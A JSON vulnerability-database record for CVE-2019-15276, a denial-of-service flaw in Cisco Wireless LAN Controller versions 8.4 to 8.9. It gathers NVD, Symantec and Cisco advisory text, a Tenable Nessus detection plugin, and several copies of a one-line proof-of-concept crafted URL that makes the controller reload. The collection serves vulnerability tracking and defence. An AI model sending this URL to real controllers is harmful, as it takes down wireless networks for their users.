{"id": "EDB-ID:47744", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Cisco WLC 2504 8.9 - Denial of Service (PoC)", "description": "", "published": "2019-12-04T00:00:00", "modified": "2019-12-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/47744", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-15276"], "lastseen": "2019-12-04T13:12:48", "viewCount": 157, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-15276"]}, {"type": "symantec", "idList": ["SMNTC-110781"]}, {"type": "zdt", "idList": ["1337DAY-ID-33623"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0C242FF30D886D7C0F681EC9A06A15C0"]}, {"type": "cisco", "idList": ["CISCO-SA-20191106-WLC-DOS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155554"]}, {"type": "nessus", "idList": ["CISCO-SA-20191106-WLC-DOS.NASL"]}], "modified": "2019-12-04T13:12:48", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2019-12-04T13:12:48", "rev": 2}, "vulnersScore": 5.3}, "sourceHref": "https://www.exploit-db.com/download/47744", "sourceData": "# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)\r\n# Google Dork: N/A\r\n# Date: 2019-11-25\r\n# Exploit Author: SecuNinja\r\n# Vendor Homepage: cisco.com\r\n# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos\r\n# Version: 8.4 to 8.9\r\n# Tested on: not applicable, works independent from OS\r\n# CVE : CVE-2019-15276\r\n\r\n# Exploit PoC:\r\n\r\nhttps://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00\">'><img src=\"xxxxx\">\r\n\r\n# Firing this code will cause the system to reload which results in a DoS condition.", "osvdbidlist": []}

{"cve": [{"lastseen": "2021-02-02T07:12:53", "description": "A vulnerability in the web interface of Cisco Wireless LAN Controller Software could allow a low-privileged, authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability exists due to a failure of the HTTP parsing engine to handle specially crafted URLs. An attacker could exploit this vulnerability by authenticating with low privileges to an affected controller and submitting the crafted URL to the web interface of the affected device. Conversely, an unauthenticated attacker could exploit this vulnerability by persuading a user of the web interface to click the crafted URL. A successful exploit could allow the attacker to cause an unexpected restart of the device, resulting in a DoS condition.", "edition": 10, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-26T03:15:00", "title": "CVE-2019-15276", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15276"], "modified": "2019-12-11T17:38:00", "cpe": [], "id": "CVE-2019-15276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15276", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": []}], "symantec": [{"lastseen": "2019-11-07T21:14:47", "bulletinFamily": "software", "cvelist": ["CVE-2019-15276"], "description": "### Description\n\nCisco Wireless LAN Controller is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause a restart to the device, resulting in denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCvp92098.\n\n### Technologies Affected\n\n * Cisco Wireless Lan Controller Software 8.4 \n * Cisco Wireless Lan Controller Software 8.5 \n * Cisco Wireless Lan Controller Software 8.6 \n * Cisco Wireless Lan Controller Software 8.7 \n * Cisco Wireless Lan Controller Software 8.8 \n * Cisco Wireless Lan Controller Software 8.9 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, block access at the network perimeter to computers hosting the vulnerable device.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-11-06T00:00:00", "published": "2019-11-06T00:00:00", "id": "SMNTC-110781", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110781", "type": "symantec", "title": "Cisco Wireless LAN Controller CVE-2019-15276 Denial of Service Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-12-05T11:00:52", "description": "", "published": "2019-12-04T00:00:00", "type": "packetstorm", "title": "Cisco WLC 2504 8.9 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-15276"], "modified": "2019-12-04T00:00:00", "id": "PACKETSTORM:155554", "href": "https://packetstormsecurity.com/files/155554/Cisco-WLC-2504-8.9-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC) \n# Google Dork: N/A \n# Date: 2019-11-25 \n# Exploit Author: SecuNinja \n# Vendor Homepage: cisco.com \n# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos \n# Version: 8.4 to 8.9 \n# Tested on: not applicable, works independent from OS \n# CVE : CVE-2019-15276 \n \n# Exploit PoC: \n \nhttps://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00\">'><img src=\"xxxxx\"> \n \n# Firing this code will cause the system to reload which results in a DoS condition. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155554/ciscowlc250489-dos.txt"}], "zdt": [{"lastseen": "2019-12-04T16:03:47", "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "published": "2019-12-04T00:00:00", "title": "Cisco WLC 2504 8.9 - Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-15276"], "modified": "2019-12-04T00:00:00", "id": "1337DAY-ID-33623", "href": "https://0day.today/exploit/description/33623", "sourceData": "# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)\r\n# Exploit Author: SecuNinja\r\n# Vendor Homepage: cisco.com\r\n# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos\r\n# Version: 8.4 to 8.9\r\n# Tested on: not applicable, works independent from OS\r\n# CVE : CVE-2019-15276\r\n\r\n# Exploit PoC:\r\n\r\nhttps://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00\">'><img src=\"xxxxx\">\r\n\r\n# Firing this code will cause the system to reload which results in a DoS condition.\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33623"}], "cisco": [{"lastseen": "2020-12-24T11:40:33", "bulletinFamily": "software", "cvelist": ["CVE-2019-15276"], "description": "A vulnerability in the web interface of Cisco Wireless LAN Controller Software could allow a low-privileged, authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.\n\nThe vulnerability exists due to a failure of the HTTP parsing engine to handle specially crafted URLs. An attacker could exploit this vulnerability by authenticating with low privileges to an affected controller and submitting the crafted URL to the web interface of the affected device. Conversely, an unauthenticated attacker could exploit this vulnerability by persuading a user of the web interface to click the crafted URL. A successful exploit could allow the attacker to cause an unexpected restart of the device, resulting in a DoS condition.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos\"]", "modified": "2020-05-11T15:58:49", "published": "2019-11-06T16:00:00", "id": "CISCO-SA-20191106-WLC-DOS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos", "type": "cisco", "title": "Cisco Wireless LAN Controller HTTP Parsing Engine Denial of Service Vulnerability", "cvss": {"score": 7.7, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"}}], "exploitpack": [{"lastseen": "2020-04-01T20:39:50", "description": "\nCisco WLC 2504 8.9 - Denial of Service (PoC)", "edition": 1, "published": "2019-12-04T00:00:00", "title": "Cisco WLC 2504 8.9 - Denial of Service (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-15276"], "modified": "2019-12-04T00:00:00", "id": "EXPLOITPACK:0C242FF30D886D7C0F681EC9A06A15C0", "href": "", "sourceData": "# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)\n# Google Dork: N/A\n# Date: 2019-11-25\n# Exploit Author: SecuNinja\n# Vendor Homepage: cisco.com\n# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos\n# Version: 8.4 to 8.9\n# Tested on: not applicable, works independent from OS\n# CVE : CVE-2019-15276\n\n# Exploit PoC:\n\nhttps://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00\">'><img src=\"xxxxx\">\n\n# Firing this code will cause the system to reload which results in a DoS condition.", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2020-08-21T09:10:19", "description": "A denial of service (DoS) vulnerability exists in Cisco Wireless Lan Controller due to a HTTP Parsing Engine Vulnerability.\nAn unauthenticated, remote attacker can exploit this issue, via a HTTP request, to cause the device to stop responding.\nPlease see the included Cisco Bug IDs and Cisco Security Advisory for more information", "edition": 15, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2019-11-22T00:00:00", "title": "Cisco Wireless LAN Controller HTTP Parsing Engine Denial of Service Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-15276"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/o:cisco:wireless_lan_controller_software"], "id": "CISCO-SA-20191106-WLC-DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/131230", "sourceData": "#TRUSTED 412a69bbd50fe1e910d6dc37f7011760567f68011d7ac63ba2fa67d69ae7b1c7fdf172a98ca13b286185e547d9f8af94d267057e32f48caeb2955d2a3aba1d2e56807284c939c9105d9fa25aa489dd36810ca3396f15fbcd8255e534d1f43a1122792aa3b48aac0850a1399bfd76fbe9f4cf947008d1ba0433a8c3a1990c5b0157b32585e39460feee5aabdc059df77b91f7952b376139358e2d49e54b2fd30abe1056ccc0d162e6dcb6a374f0342fd7a4ab52ba4a82ab771caac6f1661b2f836a5970fdc4d282dc0123bdfe79399989325f8ef4d9f6ebba63f06c3d03bf77ea1e7cbdd1c02ed3edf861655acce716254d031ba812a2ebd944344be963a44b31f46de22b24b6d2c3afd097c0bb038601ea94bf109645c04b24daadfb7b6cde249e8629b01dfc86c1591007417e5c0a178af6530d79c51f68de542377b109ca4fb1ec4640d3eaec231974ac278aea5e11b3c37e6bc551a38c9b42493f0ff8cc621a5a46353b3ecdf88b4dec528fbfc8ea479cc898caeeb640d981615412f0a58dd8da6b740c5d0c2124b8f756a0028410b9d75d28084ce032dc74d6fc96ee133025fcd980ed9c22723e38485a0d0a308212156a7696106b27058006d06f8b052b57463a841fafe35c3f161f7b7646e486f464efb937f37d49b7ed4c95ae734f890e8fcc9c23754ed124f94a44481652a9b659ae878ee4996556bbb9f64165ec9a\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131230);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/20\");\n\n script_cve_id(\"CVE-2019-15276\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvp92098\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20191106-wlc-dos\");\n script_xref(name:\"IAVA\", value:\"2019-A-0424\");\n\n script_name(english:\"Cisco Wireless LAN Controller HTTP Parsing Engine Denial of Service Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability exists in Cisco Wireless Lan Controller due to a HTTP Parsing Engine Vulnerability.\nAn unauthenticated, remote attacker can exploit this issue, via a HTTP request, to cause the device to stop responding.\nPlease see the included Cisco Bug IDs and Cisco Security Advisory for more information\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f68b41a\");\n # https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvp92098\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eafb222d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version for your machine as referenced in Cisco bug ID CSCvp92098\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15276\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:wireless_lan_controller_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_wlc_version.nasl\");\n script_require_keys(\"Host/Cisco/WLC/Version\", \"Host/Cisco/WLC/Port\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Wireless LAN Controller (WLC)');\n\nvuln_ranges = [ # 8.8 will get Maintainence Version in the future.\n { 'min_ver' : '8.4', 'fix_ver' : '8.5.160.0'},\n { 'min_ver' : '8.6', 'fix_ver' : '8.10'}\n];\n\nreporting = make_array(\n 'port' , product_info['port'],\n 'disable_caveat' , TRUE,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvp92098'\n);\n\ncisco::check_and_report(\n product_info:product_info, \n reporting:reporting, \n vuln_ranges:vuln_ranges);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}]}